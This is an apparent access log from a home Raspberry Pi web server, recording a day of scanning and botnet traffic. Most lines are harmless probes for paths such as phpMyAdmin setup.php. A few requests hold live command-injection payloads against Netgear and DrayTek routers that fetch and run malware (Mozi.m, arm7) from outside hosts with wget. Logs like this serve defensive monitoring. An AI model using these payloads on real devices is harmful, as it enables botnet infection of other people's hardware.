Wed Apr 15 06:25:07 MDT 2020
 06:25:07 up 50 days, 10:53,  1 user,  load average: 0.59, 0.30, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 50days  1:12m  2.34s /usr/bin/lxsession -s LXDE-pi -e LXDE
213.74.121.58 - - [15/Apr/2020:12:34:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:04 +0000] "GET /asdasdasd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:08 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:12 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:14 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:19 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:21 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
213.74.121.58 - - [15/Apr/2020:12:34:23 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
35.205.86.202 - - [15/Apr/2020:13:23:30 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
35.233.105.134 - - [15/Apr/2020:13:34:59 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
159.255.181.8 - - [15/Apr/2020:13:44:53 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" ""
189.75.111.243 - - [15/Apr/2020:14:00:41 +0000] "GET / HTTP/1.1" 400 0 "" ""
178.93.62.153 - - [15/Apr/2020:14:12:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.243.128.190 - - [15/Apr/2020:14:18:11 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
193.19.100.114 - - [15/Apr/2020:14:21:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:20 +0000] "GET /asdasdasd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:20 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:20 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:21 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:21 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:24 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
193.19.100.114 - - [15/Apr/2020:14:21:25 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
71.6.232.4 - - [15/Apr/2020:14:59:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
206.223.174.86 - - [15/Apr/2020:15:14:14 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
206.223.174.86 - - [15/Apr/2020:15:14:14 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.236.218.12 - - [15/Apr/2020:16:35:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.136.101.94 - - [15/Apr/2020:16:37:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
78.230.224.211 - - [15/Apr/2020:17:51:01 +0000] "GET / HTTP/1.1" 400 0 "" ""
86.122.51.138 - - [15/Apr/2020:18:17:25 +0000] "GET / HTTP/1.1" 400 0 "" ""
185.153.197.103 - - [15/Apr/2020:18:34:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.153.197.103 - - [15/Apr/2020:18:41:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
194.213.123.246 - - [15/Apr/2020:18:47:57 +0000] "GET / HTTP/1.1" 400 0 "" ""
89.169.46.70 - - [15/Apr/2020:20:48:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
34.70.171.186 - - [15/Apr/2020:21:36:28 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu"
34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu"
34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu"
34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu"
34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu"
34.70.171.186 - - [15/Apr/2020:21:36:29 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu"
185.202.1.16 - - [15/Apr/2020:22:08:01 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
185.202.1.16 - - [15/Apr/2020:22:08:01 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.202.1.16 - - [15/Apr/2020:22:08:01 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
208.91.109.18 - - [15/Apr/2020:22:40:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
185.237.177.191 - - [15/Apr/2020:23:35:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
84.236.64.130 - - [16/Apr/2020:00:03:42 +0000] "GET / HTTP/1.1" 400 0 "" ""
150.136.248.154 - - [16/Apr/2020:01:14:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /asdasdasd HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /console HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /horde/imp/test.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:28 +0000] "GET /login.action HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:29 +0000] "GET /login?from=0.000000 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
150.136.248.154 - - [16/Apr/2020:01:14:29 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
154.126.177.56 - - [16/Apr/2020:01:16:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.205.86.202 - - [16/Apr/2020:01:19:40 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
1.0.246.77 - - [16/Apr/2020:02:33:06 +0000] "GET / HTTP/1.1" 400 0 "" ""
162.243.132.176 - - [16/Apr/2020:03:38:00 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
176.113.115.249 - - [16/Apr/2020:03:48:03 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
107.6.169.250 - - [16/Apr/2020:04:35:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 "
13.65.201.223 - - [16/Apr/2020:04:45:21 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
13.65.201.223 - - [16/Apr/2020:04:45:21 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
189.129.135.99 - - [16/Apr/2020:05:17:05 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
189.129.135.99 - - [16/Apr/2020:05:17:06 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
13.65.201.223 - - [16/Apr/2020:05:20:57 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
13.65.201.223 - - [16/Apr/2020:05:20:57 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
104.35.227.239 - - [16/Apr/2020:06:58:13 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
104.35.227.239 - - [16/Apr/2020:06:58:13 +0000] "GET / HTTP/1.1" 200 25000 "" ""
220.189.199.83 - - [16/Apr/2020:07:55:28 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
220.189.199.83 - - [16/Apr/2020:07:55:28 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
91.106.64.249 - - [16/Apr/2020:08:12:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
54.154.233.206 - - [16/Apr/2020:08:48:21 +0000] "GET / HTTP/1.1" 200 25000 "" "Apache-HttpClient/4.5.1 (Java/1.8.0_192)"
54.154.233.206 - - [16/Apr/2020:08:48:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Java/1.8.0_192"
36.67.104.11 - - [16/Apr/2020:09:21:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
120.72.16.194 - - [16/Apr/2020:09:36:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
113.96.131.198 - - [16/Apr/2020:09:56:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
171.67.70.85 - - [16/Apr/2020:10:25:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
80.24.44.11 - - [16/Apr/2020:10:37:18 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
80.24.44.11 - - [16/Apr/2020:10:37:18 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
74.84.255.220 - - [16/Apr/2020:10:57:24 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
74.84.255.220 - - [16/Apr/2020:10:57:24 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
61.219.11.153 - - [16/Apr/2020:12:23:51 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
Thu Apr 16 06:25:06 MDT 2020
 06:25:06 up 51 days, 10:53,  1 user,  load average: 0.35, 0.22, 0.19
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 51days  1:13m  2.34s /usr/bin/lxsession -s LXDE-pi -e LXDE